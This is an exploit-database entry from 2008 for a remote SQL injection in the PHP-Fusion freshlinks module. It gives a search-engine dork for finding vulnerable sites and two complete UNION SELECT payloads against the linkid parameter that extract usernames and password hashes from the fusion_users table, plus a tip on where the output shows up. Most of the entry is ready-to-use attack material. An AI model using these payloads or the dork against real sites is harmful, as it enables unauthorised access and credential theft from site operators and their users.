id: 3797
date: 09/27/2008
title: PHP-Fusion Mod freshlinks (linkid) Remote SQL Injection Vuln
author: boom3rang
cves: 

============================================================
PHP-Fusion Mod freshlinks (linkid) Remote SQL Injection Vuln
============================================================


[+] Dork:                     inurl:"freshlinks_panel/index.php?linkid"

[+] Example:         http://localhost/infusions/freshlinks_panel/index.php?linkid= [SQL] &frame

username:
index.php?linkid=-9999/**/union/**/all/**/select/**/1,user_name,3,4,5,6,7,8/**/from/**/fusion_users--&frame

password: 
index.php?linkid=-9999/**/union/**/all/**/select/**/1,user_password,3,4,5,6,7,8/**/from/**/fusion_users--&frame


ps. Username and Password you can find in Title!

############################################




#  0day.today [2023-03-21]  #